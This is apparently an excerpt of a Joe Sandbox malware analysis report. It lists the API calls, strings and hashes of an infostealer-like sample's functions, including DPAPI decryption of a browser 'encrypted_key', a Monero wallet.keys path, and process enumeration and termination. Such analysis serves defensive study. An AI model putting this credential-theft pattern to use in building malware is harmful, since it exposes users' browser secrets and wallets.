                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 4eba89760b74ce8f3e519a61d7652abb7368cb4ebec50d74dc58d61693737b9b
                            • Instruction ID: 4ed6f56935f831d15694e7fefe7216654275f430f9b048c4611822ee298e9421
                            • Opcode Fuzzy Hash: 4eba89760b74ce8f3e519a61d7652abb7368cb4ebec50d74dc58d61693737b9b
                            • Instruction Fuzzy Hash: DA510071D0060CABDB05FBA0EC56EED7779AF54304F40852DF916AA191EE346E09CBA2
                            Function 003C3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 766415001a91a7c1041322abd82de20e1ed4c7a5826f38438da096e00fb4df61
                            • Instruction ID: d112c58926c3b4ab20ece14d449257e0b984027b3b2fdce285412e3a84c4c4be
                            • Opcode Fuzzy Hash: 766415001a91a7c1041322abd82de20e1ed4c7a5826f38438da096e00fb4df61
                            • Instruction Fuzzy Hash: 95412FB1D10209ABCB05EFE4D885FEEB778AB54704F10841DE416BB290DB75AE05CFA2
                            Function 003B9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                              • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                              • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                              • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                              • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                              • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                              • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003B9D39
                              • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9AEF
                              • Part of subcall function 003B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003B4EEE,00000000,?), ref: 003B9B01
                              • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9B2A
                              • Part of subcall function 003B9AC0: LocalFree.KERNEL32(?,?,?,?,003B4EEE,00000000,?), ref: 003B9B3F
                              • Part of subcall function 003B9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B9B84
                              • Part of subcall function 003B9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 003B9BA3
                              • Part of subcall function 003B9B60: LocalFree.KERNEL32(?), ref: 003B9BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 1ca5c59970e86133a65a94582ff68f30b7dac4aab32202ea31a67a0f662921e0
                            • Instruction ID: 7a8166f738c2a8a50433b90bfe5bf7a47927040b409950bf6b15ae0b2a7d2816
                            • Opcode Fuzzy Hash: 1ca5c59970e86133a65a94582ff68f30b7dac4aab32202ea31a67a0f662921e0
                            • Instruction Fuzzy Hash: 2A31FEB6D1020DABDF15DBE4DC85FEEB7B8AB48308F14451AEB05A7241E7359A04CBA1
                            Function 003C94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 003C94EB
                              • Part of subcall function 003C8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003C951E,00000000), ref: 003C8D5B
                              • Part of subcall function 003C8D50: RtlAllocateHeap.NTDLL(00000000), ref: 003C8D62
                              • Part of subcall function 003C8D50: wsprintfW.USER32 ref: 003C8D78
                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 003C95AB
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 003C95C9
                            • CloseHandle.KERNEL32(00000000), ref: 003C95D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID:
                            • API String ID: 3729781310-0
                            • Opcode ID: e53adff21416d4238c7ea474ce73c81d7ede4d392a7bdb815256a1864b222f2b
                            • Instruction ID: 9df6da558f02dcb5d3649479d18ca5499956d16faa59e8c208a891ecd2c27ee9
                            • Opcode Fuzzy Hash: e53adff21416d4238c7ea474ce73c81d7ede4d392a7bdb815256a1864b222f2b
                            • Instruction Fuzzy Hash: 82311BB1E0120C9FDB15DBE0CD49FEDB778EB54300F104459E50AEA184DB78AE89DB52
                            Function 003C8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003D05B7), ref: 003C86CA
                            • Process32First.KERNEL32(?,00000128), ref: 003C86DE
                            • Process32Next.KERNEL32(?,00000128), ref: 003C86F3
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • CloseHandle.KERNEL32(?), ref: 003C8761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: c48630a78019bdc9835dca8b2b0a46fc49ecea198ea0cbc0405b44f2344575ea
                            • Instruction ID: 309c1f561a85c6cfd6618800c09c82f851f31b100b83aa8be8b44db77f525d4f
                            • Opcode Fuzzy Hash: c48630a78019bdc9835dca8b2b0a46fc49ecea198ea0cbc0405b44f2344575ea
                            • Instruction Fuzzy Hash: E7315C71901618ABCB26EB50DC45FEEB778EF45704F10419DE50AE61A0DF346E45CFA2
                            Function 003C7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003D0E00,00000000,?), ref: 003C79B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C79B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,003D0E00,00000000,?), ref: 003C79C4
                            • wsprintfA.USER32 ref: 003C79F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: a14c5ccbbf77041d7aeb5617ec9d67b3c9b55fbca32e7f18ee379ee270fc9076
                            • Instruction ID: 0fdebe0e43635d5d2503d0587a961c631e65f6cb5795419088d0bb46351dd7e5
                            • Opcode Fuzzy Hash: a14c5ccbbf77041d7aeb5617ec9d67b3c9b55fbca32e7f18ee379ee270fc9076
                            • Instruction Fuzzy Hash: 2E1115B2904118ABCB149FC9DD45BBEB7F8FB48B11F10421AF605E2280E2795944DBB2
                            Function 003CC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 003CC74E
                              • Part of subcall function 003CBF9F: __amsg_exit.LIBCMT ref: 003CBFAF
                            • __getptd.LIBCMT ref: 003CC765
                            • __amsg_exit.LIBCMT ref: 003CC773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 003CC797
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: bcdb634c7a3eb1376faa62abdadd804548b8f7411635f8e6a8172f7f199555e7
                            • Instruction ID: c51286c3d6e5bdf1fc6bbae6aad283d273d37148f361f4034b19d5e0ac6673c2
                            • Opcode Fuzzy Hash: bcdb634c7a3eb1376faa62abdadd804548b8f7411635f8e6a8172f7f199555e7
                            • Instruction Fuzzy Hash: 64F090329156149FDB23BBB86C07F5DB3A0AF00724F25514DF408EE2D2CB645D409F56
                            Function 003C4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 003C4F7A
                            • lstrcat.KERNEL32(?,003D1070), ref: 003C4F97
                            • lstrcat.KERNEL32(?,01089058), ref: 003C4FAB
                            • lstrcat.KERNEL32(?,003D1074), ref: 003C4FBD
                              • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C492C
                              • Part of subcall function 003C4910: FindFirstFileA.KERNEL32(?,?), ref: 003C4943
                              • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FDC), ref: 003C4971
                              • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FE0), ref: 003C4987
                              • Part of subcall function 003C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003C4B7D
                              • Part of subcall function 003C4910: FindClose.KERNEL32(000000FF), ref: 003C4B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 4c589258798313bbadc309ab50ab58bbb038f745a9670b65916ca3a5e9792fa6
                            • Instruction ID: 080dcad8e4f3baff790ae4c296ea466eb29b49efab4b3f8174de317bdc6c4008
                            • Opcode Fuzzy Hash: 4c589258798313bbadc309ab50ab58bbb038f745a9670b65916ca3a5e9792fa6
                            • Instruction Fuzzy Hash: AD21A7B690020867C755F760EC46FE9333CAB54700F004549B64DDA181EE759ACDDBA3